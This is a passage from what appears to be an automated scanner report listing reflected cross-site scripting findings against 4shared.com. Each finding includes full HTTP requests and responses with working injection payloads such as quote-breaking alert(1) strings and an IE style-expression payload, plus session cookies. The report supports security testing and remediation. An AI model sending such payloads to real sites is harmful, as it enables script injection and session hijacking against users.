Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /css963c0&quot;-alert(1)-&quot;d0f9ab9eff7/style.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:05:47 GMT
Content-Length: 38813


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css963c0"-alert(1)-"d0f9ab9eff7/style.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.15. http://www.4shared.com/css/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c96c9'-alert(1)-'b79829cc7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/style.cssc96c9'-alert(1)-'b79829cc7?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/requestCall.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /css/style.cssc96c9'-alert(1)-'b79829cc7
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:06:07 GMT
Content-Length: 38813


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
f loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/css/style.cssc96c9'-alert(1)-'b79829cc7',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.16. http://www.4shared.com/css/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f4d7"-alert(1)-"3bd13b9ba48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/style.css1f4d7"-alert(1)-"3bd13b9ba48?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/requestCall.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /css/style.css1f4d7&quot;-alert(1)-&quot;3bd13b9ba48
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:06:05 GMT
Content-Length: 38822


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/style.css1f4d7"-alert(1)-"3bd13b9ba48";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.17. http://www.4shared.com/desktop/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /desktop/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39bd0"-alert(1)-"0194b888027 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /desktop39bd0"-alert(1)-"0194b888027/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /desktop39bd0&quot;-alert(1)-&quot;0194b888027/
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:42 GMT
Content-Length: 38776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/desktop39bd0"-alert(1)-"0194b888027/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

2.18. http://www.4shared.com/desktop/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /desktop/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c831e'-alert(1)-'76148be9808 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /desktopc831e'-alert(1)-'76148be9808/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /desktopc831e'-alert(1)-'76148be9808/
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:47 GMT
Content-Length: 38778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/desktopc831e'-alert(1)-'76148be9808/',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

2.19. http://www.4shared.com/enter.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enter.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2ad2"-alert(1)-"9871eca0b34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /enter.jspf2ad2"-alert(1)-"9871eca0b34?sId=Sdt45IRrRqsiuJEj&&fau=1&ausk=Sdt45IRrRqsiuJEj&au=1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /enter.jspf2ad2&quot;-alert(1)-&quot;9871eca0b34
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:35 GMT
Content-Length: 38834


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/enter.jspf2ad2"-alert(1)-"9871eca0b34";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.20. http://www.4shared.com/enter.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enter.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2cc3'-alert(1)-'d37f781642a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /enter.jspf2cc3'-alert(1)-'d37f781642a?sId=Sdt45IRrRqsiuJEj&&fau=1&ausk=Sdt45IRrRqsiuJEj&au=1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /enter.jspf2cc3'-alert(1)-'d37f781642a
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:42 GMT
Content-Length: 38835


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/enter.jspf2cc3'-alert(1)-'d37f781642a',
remember : true


,sId : 'Sdt45IRrRqsiuJEj'

},
function(){
showLoginBox();
}
);
}els
...[SNIP]...

2.21. http://www.4shared.com/enter.jsp [au parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enter.jsp

Issue detail

The value of the au request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5bd7"style%3d"x%3aexpression(alert(1))"10739e700ef was submitted in the au parameter. This input was echoed as e5bd7"style="x:expression(alert(1))"10739e700ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /enter.jsp?sId=Sdt45IRrRqsiuJEj&&fau=1&ausk=Sdt45IRrRqsiuJEj&au=1e5bd7"style%3d"x%3aexpression(alert(1))"10739e700ef HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:01 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 35131
Date: Fri, 29 Jul 2011 13:59:01 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login or S
...[SNIP]...
<input type="hidden" name="au" value="1e5bd7"style="x:expression(alert(1))"10739e700ef"/>
...[SNIP]...

2.22. http://www.4shared.com/enterprise/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enterprise/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3894c"-alert(1)-"c12c2b26d35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /enterprise3894c"-alert(1)-"c12c2b26d35/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/premium.jsp?ref=header
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /enterprise3894c&quot;-alert(1)-&quot;c12c2b26d35/
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:04:40 GMT
Content-Length: 38814


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/enterprise3894c"-alert(1)-"c12c2b26d35/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

2.23. http://www.4shared.com/enterprise/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enterprise/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c277'-alert(1)-'845e0f33c14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /enterprise4c277'-alert(1)-'845e0f33c14/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/premium.jsp?ref=header
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /enterprise4c277'-alert(1)-'845e0f33c14/
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:04:42 GMT
Content-Length: 38815


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/enterprise4c277'-alert(1)-'845e0f33c14/',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

2.24. http://www.4shared.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4fc2'-alert(1)-'c41a99863bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icof4fc2'-alert(1)-'c41a99863bc HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /favicon.icof4fc2'-alert(1)-'c41a99863bc
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:37 GMT
Content-Length: 38774


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/favicon.icof4fc2'-alert(1)-'c41a99863bc',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.25. http://www.4shared.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f195b"-alert(1)-"6b92c01de75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icof195b"-alert(1)-"6b92c01de75 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
